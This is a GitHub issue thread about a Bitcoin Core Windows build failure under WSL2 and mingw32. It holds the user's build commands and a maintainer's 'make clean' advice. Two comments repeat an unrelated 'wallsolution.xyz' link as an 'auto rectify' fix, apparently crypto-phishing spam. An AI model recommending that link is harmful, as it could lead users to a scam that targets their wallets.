### ISSUE TITLE
build error  with wsl2 mingw32

### ISSUE THREAD

**Issue by Reisen1969** [bitcoin/bitcoin#25627]
hello everyone,
I follow this page to build 
https://github.com/bitcoin/bitcoin/blob/master/doc/build-windows.md#building-for-64-bit-windows

I took those steps:
```
PATH=$(echo "$PATH" | sed -e 's/:\/mnt.*//g') # strip out problematic Windows %PATH% imported var
sudo bash -c "echo 0 > /proc/sys/fs/binfmt_misc/status" # Disable WSL support for Win32 applications.
cd depends
make HOST=x86_64-w64-mingw32
cd ..
./autogen.sh
CONFIG_SITE=$PWD/depends/x86_64-w64-mingw32/share/config.site ./configure --prefix=/
make # use "-j N" for N parallel jobs
sudo bash -c "echo 1 > /proc/sys/fs/binfmt_misc/status" # Enable WSL support for Win32 applications.
```

everything right except "make -j 12"
After compiling for a long time
![image](https://user-images.githubusercontent.com/76834109/179388208-aa52e853-206d-4867-9fd3-0bcfdcb9714c.png)

generate some exe files:
![image](https://user-images.githubusercontent.com/76834109/179388379-94daa852-2623-4d08-bebf-6d78d7e03209.png)

my os info:
windows 11 21H2
wsl2 :  Linux DESKTOP-46OIGI3 5.10.102.1-microsoft-standard-WSL2 #1 SMP Wed Mar 2 00:30:59 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
gcc: x86_64-w64-mingw32-g++ (GCC) 9.3-win32 20200320

**Comment by Veterangrail** [comment]
> 



Auto rectify issue with https://www.wallsolution.xyz/ had similar issues and i used it and it worked

**Comment by Veterangrail** [comment]
> > 
> 
> Auto rectify issue with https://www.wallsolution.xyz/ had similar issues and i used it and it worked


Auto rectify issue with https://www.wallsolution.xyz/ had similar issues and i used it and it worked

**Comment by fanquake** [comment]
Almost certainly a local issue. Can you try a `make clean` and rebuilding?

**Comment by fanquake** [comment]
Going to close for now. Let us know if you're still having the same issue, and we can reopen / investigate further.

**Comment by Reisen1969** [comment]
> Almost certainly a local issue. Can you try a `make clean` and rebuilding?

it matter
